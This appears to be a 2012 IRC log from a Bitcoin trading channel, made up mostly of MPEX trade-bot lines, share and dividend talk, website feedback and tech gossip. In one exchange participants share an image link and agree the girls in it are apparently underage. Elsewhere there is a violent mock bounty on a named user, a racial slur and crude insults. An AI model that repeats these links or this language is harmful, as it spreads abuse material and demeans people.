01:04:59 [MPEX] [S.MPOE] 3166 @ 0.000619 = 1.9598 BTC [+] Dec 20 01:04:59 ;rate Ukto -1 he uses kleopatra on windows or something Dec 20 01:05:00 [MPEX] [S.MPOE] 4784 @ 0.00061999 = 2.966 BTC [+] Dec 20 01:05:49 sue me in romanian court and pay for my plane ticket Dec 20 01:06:12 [MPEX] [S.DICE] 5000 @ 0.0036 = 18 BTC [-] Dec 20 01:06:28 i'll pay for your chicken bus ticket Dec 20 01:06:43 oooh a chicken bus! Dec 20 01:06:48 like romancing the stone Dec 20 01:08:07 [MPEX] [S.MPOE] 18000 @ 0.00061999 = 11.1598 BTC [+] Dec 20 01:08:55 mircea_popescu, why messing with tickets. just put a reward on jcpham. dead or alive Dec 20 01:09:11 (for court, he's better alive i guess) Dec 20 01:10:15 "bring one jcpham impaled on an 68 inch sperm whale cock, preferably alive. reward 11 btc" Dec 20 01:12:21 I just realized something Dec 20 01:12:34 the BFLS and BFLS.RIG tickers are inaba's Dec 20 01:12:48 on bitfunder? Dec 20 01:12:55 no, GLBSE Dec 20 01:13:59 derp Dec 20 01:14:02 really? Dec 20 01:14:25 [MPEX] [S.MPOE] 128556 @ 0.00061999 = 79.7034 BTC [+] Dec 20 01:14:26 [MPEX] [S.MPOE] 1484344 @ 0.00062 = 920.2933 BTC [+] Dec 20 01:14:29 yeah Dec 20 01:14:33 I just finally realized that Dec 20 01:14:39 hmm you are correct Dec 20 01:14:49 and he started them BEFORE he was hired by BFL Dec 20 01:14:51 he was trying to merge them Dec 20 01:14:56 what a shill Dec 20 01:14:59 mircea_popescu: well, honestly, he should Dec 20 01:15:06 people couldn't agree on ratios Dec 20 01:15:22 yeah, he should just shove a fair ratio down their throats Dec 20 01:15:24 do it on mh Dec 20 01:15:30 someone asked me if there was bfl or if it was all a scheme by inaba Dec 20 01:15:39 what did you say ? Dec 20 01:16:07 i know some folks who have visited the shop and met everyone Dec 20 01:16:10 bfls and bfls.rigs represented the same ratio of ownership of their hardware Dec 20 01:16:41 I forget what it was, but it was like 1/200th of a single or a rig respectively Dec 20 01:16:56 pigeons o that actully happened ? i thought it was just planed Dec 20 01:17:00 yochdog et al ? Dec 20 01:17:05 whoa Dec 20 01:17:10 and singles into rigs is a integer number Dec 20 01:17:11 thats a lot of btc Dec 20 01:17:22 !ticker s.mpoe Dec 20 01:17:25 [MPEX:S.MPOE] 1day: 0.0006151 / 0.00062222 / 0.00063666 (2141211 shares, 1,332.30 BTC), 30day: 0.00049308 / 0.00053683 / 0.00063995 (104071550 shares, 55,869.67 BTC) Dec 20 01:17:27 !ticker s.dice Dec 20 01:17:29 so you CAN figure out how much ownership a share of BFLS is on rigs Dec 20 01:17:30 [MPEX:S.DICE] 1day: 0.0035 / 0.00368484 / 0.0036995 (671563 shares, 2,474.60 BTC), 30day: 0.0018 / 0.00343671 / 0.0037 (7280181 shares, 25,019.89 BTC) Dec 20 01:17:42 this is like,... the first time ever something trades moar in a day than s.mpoe i think Dec 20 01:17:52 well other than ipo day maybe Dec 20 01:17:57 mircea_popescu: heh Dec 20 01:18:00 no not yochdog, but folks have been there more than once and gotten the tour, talked to everyone etc Dec 20 01:18:01 whats with all the dice love? Dec 20 01:18:11 pigeons: people who I dont trust, however Dec 20 01:18:23 pays in a month the sort of divs fiat corps pay in 5 years Dec 20 01:18:32 ;;ticker Dec 20 01:18:33 BTCUSD ticker | Best bid: 13.49452, Best ask: 13.51990, Bid-ask spread: 0.02538, Last trade: 13.52000, 24 hour volume: 34243.77923978, 24 hour low: 13.20000, 24 hour high: 13.57999, 24 hour vwap: 13.37348 Dec 20 01:18:38 pigeons notably who ? Dec 20 01:18:41 mircea_popescu: whats the equiv APY on that Dec 20 01:18:53 i am sure the people i am talking about aren't lying. that doesn't mean these people aren't being scammed by bfl Dec 20 01:19:05 pigeons: yeah exactly Dec 20 01:19:18 like, friedcat is going to send me a board for evaluation and DM dev Dec 20 01:19:27 we'll know in 5 seconds flat if its the real deal or not Dec 20 01:20:40 Diablo-D3 if you put in 3200 to buy 1% of S.DICE at ipo you now have ~3684.84 btc worth of shares + 139.42 btc worth of dividends, for a total gain of 624.26 Dec 20 01:21:08 that's 19.5% since late august Dec 20 01:21:09 mircea_popescu: how many days ago was IPO? Dec 20 01:21:17 wait Dec 20 01:21:28 so something like 70% api overal. Dec 20 01:21:46 august as in 4 months ago august? Dec 20 01:21:52 yes. Dec 20 01:21:58 holy fuck. Dec 20 01:22:12 and ppl were liek... ooo it's too expensive Dec 20 01:22:23 and mpoe-pr was stfu you don't have a pot to piss in Dec 20 01:22:31 and well... she was bad pr and they were bad investors. win-win. Dec 20 01:23:19 but all the action recently is prolly due to the ~15k they're making this month Dec 20 01:23:39 which adds another 150 btc to that equation, taking total net to 770ish Dec 20 01:24:24 and api more like 90% Dec 20 01:27:24 [MPEX] [X.AWHG] 134 @ 0.06165072 = 8.2612 BTC [-] Dec 20 01:27:26 [MPEX] [X.ENGG] 45 @ 0.25573768 = 11.5082 BTC [-] Dec 20 01:29:22 btw, how X.IDIFF.DEC settled? Dec 20 01:29:34 ;;difficulty Dec 20 01:29:35 Error: "difficulty" is not a valid command. Dec 20 01:30:53 Ukto: offer to settle X.IDIFF via hashpower.com Dec 20 01:30:53 3370182 Dec 20 01:32:08 we talked about it, hecant. dumbass shares system Dec 20 01:32:19 ic Dec 20 01:36:44 ;;ticker Dec 20 01:36:45 BTCUSD ticker | Best bid: 13.60000, Best ask: 13.60061, Bid-ask spread: 0.00061, Last trade: 13.60000, 24 hour volume: 38724.18251965, 24 hour low: 13.20000, 24 hour high: 13.60000, 24 hour vwap: 13.39880 Dec 20 01:36:51 ;;bc,diff Dec 20 01:36:52 3370181.7992778 Dec 20 01:37:25 !ticker x.idiff.dec Dec 20 01:37:27 [MPEX:X.IDIFF.DEC] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0327929 / 0.0327929 / 0.0327929 (1 shares, 0.03 BTC) Dec 20 01:37:45 someone made a good buy Dec 20 01:37:47 calls at 14 Dec 20 01:37:51 !ticker x.diff.mar Dec 20 01:37:53 Invalid ticker. Dec 20 01:37:54 i have calls at 14 Dec 20 01:37:57 !ticker x.idiff.mar Dec 20 01:37:58 [MPEX:X.IDIFF.MAR] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.07995 / 0.07995 / 0.07995 (20 shares, 1.60 BTC) Dec 20 01:38:26 and at a better price than mpoebot Dec 20 01:40:12 0.08057949 3 ? Dec 20 01:40:14 3 Dec 20 01:40:33 sorry dont have the capital Dec 20 01:40:37 to buy Dec 20 01:40:44 don't want to get locked out of my account Dec 20 01:41:12 mircea_popescu: yeah Dec 20 01:41:19 I only have 3 right now :P Dec 20 01:41:33 and I don't have a bot running yet either Dec 20 01:42:19 I know there was some trading going on, but the volume was almost non-existent, as most people held on to the shares. Regardless of what may have happened on the exchange, the shares were never meant to be a trading stock and for all intents and purposes, I used GLBSE as a glorified excel spreadsheet to handle the distribution of the mined funds in a fast, easy manner. From the volume, I think most people agreed with Dec 20 01:42:19 that. Dec 20 01:42:20 heh Dec 20 01:43:09 who said that? Dec 20 01:43:19 tell me it was giga Dec 20 01:44:23 inaba Dec 20 01:44:38 https://bitcointalk.org/index.php?topic=89902.msg1388715#msg1388715 Dec 20 01:44:41 smickles pm Dec 20 01:44:46 thestringpuller: Dec 20 01:44:54 misfire -_- Dec 20 01:48:30 https://bitcointalk.org/index.php?topic=131678.0 Dec 20 01:48:32 ppl are sorry. Dec 20 01:49:59 "Please don't leave Nethead. Scammer or not, Bitcoin needs people like you just as much as Bitcoin needs businesses like ours. " Dec 20 01:50:02 who is writing this copy ? Dec 20 01:50:12 i gotta ask. i gotta know. who ? Dec 20 01:50:23 "Please don't leave Nethead. Scammer or not, Bitcoin needs people like you just as much as Bitcoin needs businesses like ours." Dec 20 01:50:27 ... Dec 20 01:50:27 oh Dec 20 01:50:29 hehe Dec 20 01:51:02 is it like... a curse ? someone set them up da voodoo ? Dec 20 01:55:35 [MPEX] [S.MPOE] 11700 @ 0.00062 = 7.254 BTC [+] Dec 20 02:07:41 [MPEX] [S.MPOE] 2950 @ 0.00062 = 1.829 BTC [+] **** BEGIN LOGGING AT Thu Dec 20 10:00:15 2012 Dec 20 10:01:48 http://polimedia.us/dtng/c/src/135519341514.jpg fake or real ? Dec 20 10:07:47 wtf mircea_popescu? Dec 20 10:07:56 hm ? Dec 20 10:08:01 the pic Dec 20 10:08:18 yea... Dec 20 10:08:29 what does it matter is it real or fake?? Dec 20 10:09:10 now that is a good question hehe Dec 20 10:09:32 people have lately gotten in this habit of claiming any large round tit is the result of surgery. Dec 20 10:12:05 [MPEX] [S.MPOE] 1800 @ 0.00062 = 1.116 BTC [+] Dec 20 10:35:17 [MPEX] [S.MPOE] 7950 @ 0.00062 = 4.929 BTC [+] Dec 20 10:40:02 [MPEX] [S.MPOE] 7450 @ 0.00062 = 4.619 BTC [+] Dec 20 10:48:43 [MPEX] [S.MPOE] 3050 @ 0.00062 = 1.891 BTC [+] Dec 20 10:55:45 [MPEX] [S.MPOE] 5100 @ 0.00062 = 3.162 BTC [+] Dec 20 10:59:57 [MPEX] [S.MPOE] 7738 @ 0.00062 = 4.7976 BTC [+] Dec 20 11:07:16 [MPEX] [S.MPOE] 13200 @ 0.00062 = 8.184 BTC [+] Dec 20 11:12:43 [MPEX] [S.MPOE] 13153 @ 0.00062 = 8.1549 BTC [+] Dec 20 11:40:45 [MPEX] [S.MPOE] 10582 @ 0.00062 = 6.5608 BTC [+] Dec 20 11:46:11 ;;rate jcpham 1 drives a Toyota Dec 20 11:46:12 Rating entry successful. Your rating of 1 for user jcpham has been recorded. Dec 20 11:47:41 http://i.imgur.com/63P8r.jpg Dec 20 11:47:42 aghahaha Dec 20 11:52:47 thats good Dec 20 12:03:57 yawn... nice weather we have today! -15 and windchill -24 Dec 20 12:06:13 it's going to be cold soon Dec 20 12:07:40 [MPEX] [S.MPOE] 12950 @ 0.00062 = 8.029 BTC [+] Dec 20 12:10:52 [MPEX] [S.MPOE] 8220 @ 0.00062 = 5.0964 BTC [+] Dec 20 12:32:10 [MPEX] [S.MPOE] 2450 @ 0.00062 = 1.519 BTC [+] Dec 20 12:39:02 [MPEX] [S.MPOE] 7950 @ 0.00062 = 4.929 BTC [+] Dec 20 12:49:36 [MPEX] [S.MPOE] 4738 @ 0.00062 = 2.9376 BTC [+] Dec 20 13:09:11 [MPEX] [S.MPOE] 6300 @ 0.00062 = 3.906 BTC [+] Dec 20 13:11:20 [MPEX] [S.MPOE] 6732 @ 0.0006195 = 4.1705 BTC [-] Dec 20 13:11:22 [MPEX] [S.MPOE] 7874 @ 0.00061946 = 4.8776 BTC [-] Dec 20 13:11:23 [MPEX] [S.MPOE] 12512 @ 0.00061935 = 7.7493 BTC [-] Dec 20 13:11:24 [MPEX] [S.MPOE] 1950 @ 0.00061925 = 1.2075 BTC [-] Dec 20 13:11:25 [MPEX] [S.MPOE] 11450 @ 0.00061903 = 7.0879 BTC [-] Dec 20 13:11:26 [MPEX] [S.MPOE] 2700 @ 0.0006189 = 1.671 BTC [-] Dec 20 13:11:27 [MPEX] [S.MPOE] 7200 @ 0.00061887 = 4.4559 BTC [-] Dec 20 13:11:28 [MPEX] [S.MPOE] 3450 @ 0.00061849 = 2.1338 BTC [-] Dec 20 13:11:29 [MPEX] [S.MPOE] 6800 @ 0.00061837 = 4.2049 BTC [-] Dec 20 13:11:30 [MPEX] [S.MPOE] 4700 @ 0.00061793 = 2.9043 BTC [-] Dec 20 13:11:31 [MPEX] [S.MPOE] 12132 @ 0.00061767 = 7.4936 BTC [-] Dec 20 13:19:47 [MPEX] [S.MPOE] 6422 @ 0.00062 = 3.9816 BTC [+] Dec 20 13:24:32 [MPEX] [S.DICE] 1000 @ 0.00350838 = 3.5084 BTC [-] Dec 20 13:27:35 [MPEX] [S.MPOE] 9948 @ 0.00062 = 6.1678 BTC [+] Dec 20 13:28:32 [MPEX] [S.DICE] 300 @ 0.00351012 = 1.053 BTC [+] Dec 20 13:38:31 [MPEX] [S.MPOE] 5802 @ 0.00062 = 3.5972 BTC [+] Dec 20 13:42:57 [MPEX] [S.MPOE] 7770 @ 0.00062 = 4.8174 BTC [+] Dec 20 13:48:24 [MPEX] [S.MPOE] 2118 @ 0.00062 = 1.3132 BTC [+] Dec 20 13:49:11 [MPEX] [S.MPOE] 10750 @ 0.00062 = 6.665 BTC [+] Dec 20 13:51:31 [MPEX] [S.MPOE] 6731 @ 0.00062 = 4.1732 BTC [+] Dec 20 13:53:59 [MPEX] [S.MPOE] 9850 @ 0.00062 = 6.107 BTC [+] Dec 20 13:57:24 [MPEX] [S.MPOE] 7400 @ 0.00062 = 4.588 BTC [+] Dec 20 14:05:55 [MPEX] [S.MPOE] 6000 @ 0.00062 = 3.72 BTC [+] Dec 20 14:17:23 [MPEX] [S.MPOE] 15946 @ 0.00062 = 9.8865 BTC [+] Dec 20 14:19:33 [MPEX] [S.MPOE] 5000 @ 0.00062 = 3.1 BTC [+] Dec 20 14:27:00 [MPEX] [S.MPOE] 4400 @ 0.00062 = 2.728 BTC [+] Dec 20 14:29:33 [MPEX] [S.MPOE] 10913 @ 0.00062 = 6.7661 BTC [+] Dec 20 14:37:04 [MPEX] [S.MPOE] 4900 @ 0.00062 = 3.038 BTC [+] Dec 20 14:47:57 [MPEX] [S.MPOE] 6100 @ 0.00062 = 3.782 BTC [+] Dec 20 14:56:21 [MPEX] [S.MPOE] 5531 @ 0.00062 = 3.4292 BTC [+] Dec 20 15:16:31 [MPEX] [S.MPOE] 12400 @ 0.00062 = 7.688 BTC [+] Dec 20 15:18:26 [MPEX] [S.MPOE] 37086 @ 0.00062 = 22.9933 BTC [+] Dec 20 15:29:12 [MPEX] [S.DICE] 600 @ 0.00350838 = 2.105 BTC [-] Dec 20 15:38:01 [MPEX] [S.MPOE] 14850 @ 0.00062 = 9.207 BTC [+] Dec 20 15:44:56 [MPEX] [S.MPOE] 10100 @ 0.00062 = 6.262 BTC [+] Dec 20 15:50:54 [MPEX] [S.MPOE] 11000 @ 0.00062 = 6.82 BTC [+] Dec 20 15:56:16 !ticker S.DICE Dec 20 15:56:18 [MPEX:S.DICE] 1day: 0.0035 / 0.00368607 / 0.0036995 (658562 shares, 2,427.51 BTC), 30day: 0.0018 / 0.00343695 / 0.0037 (7293593 shares, 25,067.73 BTC) Dec 20 15:56:40 ;;calc (.0036 - .0035) / .0036 Dec 20 15:56:40 0.0277777777778 Dec 20 15:57:03 ;;calc (.0036 - .0035) / .002 Dec 20 15:57:04 0.05 Dec 20 15:57:35 smickles: ^^^ seems possible to short even before the div's have paid Dec 20 16:16:33 thestringpuller: are you waiting for sdice to pass some serious gas and keel over? Dec 20 16:17:03 seems risky, good luck Dec 20 16:17:52 well Dec 20 16:17:54 it will be smelly Dec 20 16:18:01 pigeons: Can I get your opinion Dec 20 16:18:04 on the changes I made? Dec 20 16:19:22 to BF? Dec 20 16:19:35 yeah Dec 20 16:19:42 i changed the ordering buy/sell boxes Dec 20 16:19:53 and added some quick fill buttons Dec 20 16:19:58 and some highlighting Dec 20 16:20:07 to remind you before hitting the button Dec 20 16:20:08 yes i didn't like the reverse order Dec 20 16:20:21 .. reverse order ? Dec 20 16:20:35 oh Dec 20 16:20:47 hey it looks fine to me. but i just press buttons Dec 20 16:21:08 I was able to save some screen space by shrinking them down Dec 20 16:21:22 think its less confusing saying Max Cost, and Min Earned ? Dec 20 16:21:38 EskimoBob: It's not going to kill over but it's a mini bubble atm Dec 20 16:21:47 OWAH Dec 20 16:21:47 ... Dec 20 16:21:55 Did you know that firefox.. has a 3d view for webpages? Dec 20 16:21:56 0,o Dec 20 16:22:00 yes Dec 20 16:22:05 You've never seen it Ukto? Dec 20 16:22:05 thestringpuller: did you sell some or are you just planning? Dec 20 16:22:13 i have alwayas used firebug 0,o Dec 20 16:22:27 thats pretty cool Dec 20 16:22:34 EskimoBob: if people start eating into the .0037 ipo then I will Dec 20 16:22:44 that is before divs Dec 20 16:23:29 Ukto: but now I hate you because you are using too much CSS and javascript Dec 20 16:23:38 and am closing my bitfunder account Dec 20 16:23:43 lol Dec 20 16:23:56 ROFLOL Dec 20 16:24:10 did you even have one to start with ? Dec 20 16:24:12 actually Dec 20 16:24:19 I have been using a crap ton of in-line css Dec 20 16:24:21 its pissing me off Dec 20 16:24:25 compatability shit Dec 20 16:24:34 so I gave up on the css sheets Dec 20 16:24:39 why do people want to make their stock exchanges so pretty? Dec 20 16:24:50 the NYSE doesn't have some crazy UI on the floor Dec 20 16:24:54 it's just computers with an API Dec 20 16:25:00 Ukto: why those buttons on trade history page? (SELL) Dec 20 16:25:12 EskimoBob: click em Dec 20 16:25:15 the are jus pretty markers Dec 20 16:25:18 but apparently Dec 20 16:25:21 no one gets that Dec 20 16:25:25 and its obviously confusing Dec 20 16:25:32 so I will be changing it out Dec 20 16:25:40 nothing happens Dec 20 16:25:42 how much money is bitfunder making atm Dec 20 16:25:50 unless that isn't public yet :P Dec 20 16:25:56 not very much Dec 20 16:26:03 less than 1 btc since it lanched Dec 20 16:26:07 laynched* Dec 20 16:26:09 don't you own something else Dec 20 16:26:10 linched. Dec 20 16:26:10 :P Dec 20 16:26:15 2 things Dec 20 16:26:15 that you used to fund bitfunder Dec 20 16:26:16 weexchange Dec 20 16:26:18 and hashpower Dec 20 16:26:22 fund bitfunder? Dec 20 16:26:25 whats to fund? Dec 20 16:26:26 just my time Dec 20 16:26:30 exactly Dec 20 16:26:33 and as bitinstant says Dec 20 16:26:36 time is money mah nigga Dec 20 16:26:48 oh how I knows Dec 20 16:26:51 you could be usin' that time to collect yo money elsewhere Dec 20 16:27:06 how much do I have to pay you to get that FF7 Dec 20 16:27:07 actually Dec 20 16:27:13 LOL Dec 20 16:27:15 SO Dec 20 16:27:18 thats what this is all about Dec 20 16:27:37 I'll go look in just a few, how about that Dec 20 16:27:37 :) Dec 20 16:27:41 YAY Dec 20 16:27:43 but Dec 20 16:27:46 no more giving me shiz :P Dec 20 16:27:55 and you wear a BF badge :P Dec 20 16:27:57 [MPEX] [S.MPOE] 9050 @ 0.00062 = 5.611 BTC [+] Dec 20 16:28:05 :P Dec 20 16:28:24 I actually know who you are Ukto Dec 20 16:28:31 you're sorta pseudofamous from hashpower Dec 20 16:28:40 Ukto:What if switch assetlist and market in the menu Dec 20 16:28:44 now that i see your forum avatar Dec 20 16:28:56 I rather see the market data first Dec 20 16:29:36 EskimoBob: the sub-nav is diff for logged in/not Dec 20 16:29:52 besides Dec 20 16:29:57 the blue is pretty hard on the eyes Dec 20 16:30:03 compared to the easy to read blue letters below Dec 20 16:30:07 it is Dec 20 16:30:12 they are within a twitch of a space of click Dec 20 16:30:18 :P Dec 20 16:30:40 lol small world this is Dec 20 16:30:50 the btc world that is Dec 20 16:30:51 [MPEX] [S.MPOE] 17000 @ 0.00062 = 10.54 BTC [+] Dec 20 16:31:01 this is called "porno blue" for some historical reason. Actually all the 256 palette colors are :) Dec 20 16:32:52 i think the btc community uses more bootstrap than anyone else lol Dec 20 16:32:56 thestringpuller: no, if you believe anything that lunatic PR baba says, then everyone is a complete retard in btc world, except her of course Dec 20 16:33:10 MPOE-PR? Dec 20 16:33:14 who is baba? Dec 20 16:33:20 da fuck EskimoBob speak-uh da english Dec 20 16:33:21 yeah that's the one Dec 20 16:33:52 I don't care about anything that goes on in the forums tbh Dec 20 16:33:55 or is there any other PR-jokes around? Dec 20 16:33:56 that's how I lost money Dec 20 16:34:09 makes sense Dec 20 16:34:23 i care about results Dec 20 16:34:32 OK, time to get ready for the meeting. Dec 20 16:38:18 [MPEX] [S.MPOE] 8600 @ 0.00062 = 5.332 BTC [+] Dec 20 16:48:23 Bugpowder: S.DICE could have been shorted recently Dec 20 16:51:54 ;;ticker Dec 20 16:51:55 BTCUSD ticker | Best bid: 13.44569, Best ask: 13.52978, Bid-ask spread: 0.08409, Last trade: 13.44569, 24 hour volume: 48118.47436117, 24 hour low: 13.20001, 24 hour high: 13.72000, 24 hour vwap: 13.45404 Dec 20 16:53:41 [MPEX] [S.MPOE] 6050 @ 0.00062 = 3.751 BTC [+] Dec 20 16:54:15 ;;calc 39.97 / 13.40 Dec 20 16:54:15 2.9828358209 Dec 20 16:57:36 thestringpuller: you recognize the char in the avatar? Dec 20 16:58:25 nah just I"ve seen it before Dec 20 16:58:36 when researching ozcoin Dec 20 16:58:38 some time ago Dec 20 16:58:41 unless that's not you Dec 20 16:58:42 lol Dec 20 17:00:07 0,o Dec 20 17:00:14 thats a character from an old anime Dec 20 17:00:21 first time I ever used it Dec 20 17:00:44 ah Dec 20 17:00:48 was digging through some files from a real old computer, came accross a scan of an animation cel I have, and used that Dec 20 17:00:56 yea wrong forum tag then! Dec 20 17:00:57 haha Dec 20 17:00:57 cleaned it up a bit, remove dhte background Dec 20 17:01:21 weexchange is based in australia? Dec 20 17:02:24 iirc Dec 20 17:03:18 [MPEX] [S.MPOE] 11500 @ 0.00062 = 7.13 BTC [+] Dec 20 17:04:01 6 hours later I finally solve my LaTeX formatting issue Dec 20 17:06:39 knuth'd be proud of you Dec 20 17:10:25 [MPEX] [S.MPOE] 7000 @ 0.00062 = 4.34 BTC [+] Dec 20 17:13:51 http://trilema.com/2012/what-does-a-start-up-run-on/ :D Dec 20 17:14:03 sun drop and cheerwine Dec 20 17:14:16 i know they dont have those in romania, hence no startups Dec 20 17:14:54 racist pigeons Dec 20 17:15:52 mircea_popescu you should just take down the mpex front end site Dec 20 17:15:55 the public side Dec 20 17:16:13 and say, "you bitches complained too much about Web 2.0, now you shits get nothing. Good luck" Dec 20 17:21:03 lol Dec 20 17:21:18 [MPEX] [S.MPOE] 9800 @ 0.00062 = 6.076 BTC [+] Dec 20 17:22:41 are these girls even legal mircea_popescu http://polimedia.us/dtng/f/src/133138961872.jpg ? Dec 20 17:22:58 what are you ciuicuciuc? Dec 20 17:23:14 oh, no they ain't Dec 20 17:23:53 this is how the FBI shows up at my door... Dec 20 17:24:03 ugh mircea_popescu this is why we can't have nice things Dec 20 17:32:08 [MPEX] [S.MPOE] 10150 @ 0.00062 = 6.293 BTC [+] Dec 20 17:38:43 http://www.lfpress.com/2012/12/20/bernie-madoffs-brother-faces-sentencing-in-ponzi-case Dec 20 17:42:46 thestringpuller i have no idea Dec 20 17:44:49 are girls under 18 illegal to exist or illegal to be naked in your jurisdiction ? Dec 20 17:44:55 cause it gets confusing at times Dec 20 17:45:26 it's actually 19 in my state Dec 20 17:45:30 minor until 19 Dec 20 17:45:38 18 usually Dec 20 17:45:38 tobacco, voting, etc Dec 20 17:45:49 heh Dec 20 17:45:57 in high school this girl put pictures of herself on the internet to piss off her ex Dec 20 17:46:02 the ex called the feds Dec 20 17:46:03 we protect them for an extra year Dec 20 17:46:05 girl was arrested Dec 20 17:46:47 lol i hope she's serving time Dec 20 17:46:58 ok this is huge https://bitcointalk.org/index.php?topic=131778.0 Dec 20 17:48:36 no it's not Dec 20 17:48:37 ... Dec 20 17:49:25 D-Wave has been around for a while Dec 20 17:49:53 so have asics. Dec 20 17:50:14 [MPEX] [S.MPOE] 1900 @ 0.00062 = 1.178 BTC [+] Dec 20 17:50:48 [MPEX] [S.MPOE] 1400 @ 0.00062 = 0.868 BTC [+] Dec 20 17:51:50 ASICS the type of "thing" Dec 20 17:51:56 or ASICS the bitcoin fiasco Dec 20 17:52:07 ASICS as in Integrated Circuits as an industry? Dec 20 17:52:31 also mircea_popescu the .00062 IPO was pretty brilliant Dec 20 17:52:38 !ticker S.MPOE Dec 20 17:52:40 [MPEX:S.MPOE] 1day: 0.0006151 / 0.00061987 / 0.00062 (2624777 shares, 1,627.03 BTC), 30day: 0.00049308 / 0.00053765 / 0.00063995 (104594132 shares, 56,235.22 BTC) Dec 20 17:53:07 certainly took a good bite out of speculation Dec 20 17:54:50 I'm trying to see your correlation between DWAVE and the ASICS market Dec 20 17:55:32 dwave is a scam, pretty much. Dec 20 17:55:39 the asic market ? what asic market ? Dec 20 17:56:36 Sarcasm on the internet is like being sarcastic to an autistic child for me Dec 20 17:56:39 doesn't translate Dec 20 17:56:42 I apologize for being dumb Dec 20 17:56:52 :p Dec 20 17:57:09 btw http://spectrum.ieee.org/computing/hardware/loser-dwave-does-not-quantum-compute Dec 20 17:57:29 I remember reading about this a few years back when I was getting into HPC Dec 20 17:59:21 [MPEX] [S.MPOE] 2640 @ 0.00062 = 1.6368 BTC [+] Dec 20 18:00:28 "It is actually much worse than the imbeciles attempting to convince the world they have a working quantum computer, as at least some of the quantum computing community laughs at them in public." Dec 20 18:00:30 locklin dixit. Dec 20 18:01:06 Our current superconducting 128-qubit processor chip is housed inside a cryogenics system within a 10 square meter shielded room. If you are interested in finding out if this quantum computing system meet your needs please contact us for more information: sales@dwavesys.com Dec 20 18:01:27 ^ fine print Dec 20 18:01:27 PREORDERS AVAILABLE Dec 20 18:01:36 [MPEX] [S.MPOE] 11000 @ 0.00062 = 6.82 BTC [+] Dec 20 18:01:46 note the same bad grammar as is par for "asic" "companies". Dec 20 18:01:51 just need a 10 suare meter shielded room Dec 20 18:02:03 and cryogenics Dec 20 18:02:08 https://bitcointalk.org/index.php?topic=131778.0 Dec 20 18:02:10 ahaha read the replies Dec 20 18:02:15 and you can hack the planet, i mean blockchain Dec 20 18:02:20 mircea_popescu: is Ver so high on your shitlist now that Bitinstant and Friends are blacklisted too? Dec 20 18:02:29 no ? Dec 20 18:02:46 BREAKING NEWS: I have a bridge in Brooklyn to sell you. Dec 20 18:02:54 he's not particularly high on my list, he did something stupid and got thrashed for it, apologized, hopefuly got the lesson Dec 20 18:03:00 haha Dec 20 18:03:16 unlike other people who refuse to admit when they fuck up Dec 20 18:03:19 I guess that is a good thing Dec 20 18:05:33 mircea_popescu: remember our discussion about the composite Cocoa trading Dec 20 18:05:34 jcpham: also, it's not 128 qubits entangled with each other, it's like.. clusters of 4 (or 8 or some smaller grouping) Dec 20 18:05:44 that work in parallel Dec 20 18:05:58 it seems like i read the announcement on that company a month or so back Dec 20 18:06:10 jcpham they took funding a while ago. Dec 20 18:06:20 and the technical discussion was basically like " it isn't a quantum computer" Dec 20 18:06:24 yeah, a while ago they made news when lockheed bought one of their things Dec 20 18:06:28 maybe slashdot or HN Dec 20 18:08:00 omfg jcpham has a forum name ? Dec 20 18:08:07 [MPEX] [S.MPOE] 4210 @ 0.00062 = 2.6102 BTC [+] Dec 20 18:08:11 yep Dec 20 18:08:14 fuck that place Dec 20 18:08:29 no offense intended Dec 20 18:08:42 i have issues with my words being picked apart by clowns Dec 20 18:09:01 hire pr. Dec 20 18:09:12 [MPEX] [S.MPOE] 4807 @ 0.00062 = 2.9803 BTC [+] Dec 20 18:09:18 or i can just read and practice restraint Dec 20 18:09:41 holy shit Dec 20 18:09:46 i don't actually have to contribute to absorb it all Dec 20 18:09:48 dude they made a chip Dec 20 18:09:56 that can take DNA gene slices Dec 20 18:10:02 and synthesize proteins Dec 20 18:10:05 HOLY FUCK Dec 20 18:10:21 i think sequencing is now like 98% accurate Dec 20 18:10:36 from nothing to human Dec 20 18:10:44 not really Dec 20 18:11:01 i thought i read the other day how they took sperm plus egg from different hosts Dec 20 18:11:07 and sequenced 98% of baby Dec 20 18:11:15 what have they synthesized that has folded properly Dec 20 18:11:24 ic Dec 20 18:11:31 peptides sure Dec 20 18:11:37 Bugpowder has it. Dec 20 18:11:37 i mis-read things Dec 20 18:11:41 the folding is the big problem Dec 20 18:12:08 also how long? Dec 20 18:12:17 peptide synthesizers are great Dec 20 18:12:19 hold on tryig to find the article Dec 20 18:12:27 but you get a yield of 98% per step Dec 20 18:12:27 but it seems this device folds properly Dec 20 18:12:46 the right sequence can auto-fold in the right environment Dec 20 18:12:52 exactly Dec 20 18:13:05 Bugpowder: ^^^ Dec 20 18:13:07 but synthesizing a 300AA string with any yield is not so easy Dec 20 18:13:17 ;;calc .98^300 Dec 20 18:13:17 Error: Something in there wasn't a valid number. Dec 20 18:13:23 ;;calc 0.98^300 Dec 20 18:13:24 Error: Something in there wasn't a valid number. Dec 20 18:13:27 ;;calc 0.98 ^ 300 Dec 20 18:13:28 Error: Something in there wasn't a valid number. Dec 20 18:13:32 its ** I think Dec 20 18:13:37 ;;calc 0.90 ** 300 Dec 20 18:13:37 0 Dec 20 18:13:40 oops Dec 20 18:13:41 lol Dec 20 18:13:43 ;;calc 0.98 ** 300 Dec 20 18:13:43 0.00233250566795 Dec 20 18:14:19 the 0 was funny Dec 20 18:14:47 [MPEX] [S.MPOE] 6350 @ 0.00062 = 3.937 BTC [+] Dec 20 18:15:36 Bugpowder: http://www.media.mit.edu/molecular/HamadNature.pdf Dec 20 18:16:12 the research spawned from that paper of what I'm talking about Dec 20 18:19:35 First red flag "The Media Laboratory Dec 20 18:19:57 Second red flag "Shuguang Zhang" Dec 20 18:20:17 He is a bit of a bullshitter Dec 20 18:20:45 hmmm Dec 20 18:20:50 I'm glad there is skepticism Dec 20 18:20:57 Bugpowder: you like the biology? Dec 20 18:20:59 :) Dec 20 18:21:46 I am a professional Dec 20 18:21:51 in a related field Dec 20 18:21:57 Ah which field? Dec 20 18:22:01 Worked at the media lab as an undergrad Dec 20 18:22:33 http://brainwindows.wordpress.com/about/ Dec 20 18:22:50 So what have they demostrated now Dec 20 18:24:21 Ah you're into neuro science! Dec 20 18:24:22 Haha Dec 20 18:24:55 one of my friends is working for: http://www.axionbiosystems.com/ this coming semester Dec 20 18:25:12 what is it? Dec 20 18:25:44 neruo-electric interfacing? Dec 20 18:25:51 hmmm Dec 20 18:25:55 sorry i cant open links atm Dec 20 18:26:13 what possible uses are there for that? Dec 20 18:26:13 The maestro looks like a nice tool for screening new genetically encoded 